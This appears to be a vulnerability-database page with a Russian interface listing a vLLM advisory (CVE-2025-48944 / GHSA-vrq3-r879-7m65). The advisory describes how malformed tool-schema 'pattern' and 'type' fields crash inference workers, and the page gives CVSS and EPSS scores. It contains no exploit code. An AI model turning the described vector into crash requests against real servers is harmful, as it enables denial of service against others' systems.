Количество 4
Количество 4

CVE-2025-48944
vLLM is an inference and serving engine for large language models (LLMs). In version 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Version 0.9.0 fixes the issue.

CVE-2025-48944
vLLM is an inference and serving engine for large language models (LLMs). In version 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Version 0.9.0 fixes the issue.
CVE-2025-48944
vLLM is an inference and serving engine for large language models (LLM ...
GHSA-vrq3-r879-7m65
vLLM Tool Schema allows DoS via Malformed pattern and type Fields
Уязвимостей на страницу
Уязвимость | CVSS | EPSS | Опубликовано | |
---|---|---|---|---|
![]() | CVE-2025-48944 vLLM is an inference and serving engine for large language models (LLMs). In version 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Version 0.9.0 fixes the issue. | CVSS3: 4.3 | 0% Низкий | 3 месяца назад |
![]() | CVE-2025-48944 vLLM is an inference and serving engine for large language models (LLMs). In version 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Version 0.9.0 fixes the issue. | CVSS3: 6.5 | 0% Низкий | 3 месяца назад |
CVE-2025-48944 vLLM is an inference and serving engine for large language models (LLM ... | CVSS3: 6.5 | 0% Низкий | 3 месяца назад | |
GHSA-vrq3-r879-7m65 vLLM Tool Schema allows DoS via Malformed pattern and type Fields | CVSS3: 6.5 | 0% Низкий | 3 месяца назад |
Уязвимостей на страницу